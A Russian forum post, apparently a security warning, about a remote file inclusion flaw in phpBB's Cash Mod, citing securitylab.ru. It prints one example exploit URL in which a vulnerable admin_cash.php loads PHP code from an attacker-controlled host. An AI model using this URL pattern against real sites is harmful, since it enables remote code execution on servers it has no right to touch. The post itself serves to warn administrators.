Автор Тема: [security] Дыра в форуме phpBB - тебя уже хакнули?  (Прочитано 2412 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Green Kakadu

  • Координатор
  • Глобальный модератор
  • Ветеран
  • *****
  • Сообщений: 2757
  • +1/-0
  • 0
    • Просмотр профиля
    • http://gnezdo.webscript.ru
Серьезная дырища обнаружена в скрипте форума phpBB.

Уязвимость обнаружена в модуле Cash Mod в phpBB. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.

Уязвимость обнаружена в файле \'/admin/admin_cash.php\'. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Пример:

http://[target]/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://[attacker]/

источник: http://www.securitylab.ru/49563.html

А тут репортаж с места событий (жертвы):
http://dirty.ru/comments/19609
 в исканиях.

 

Sitemap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28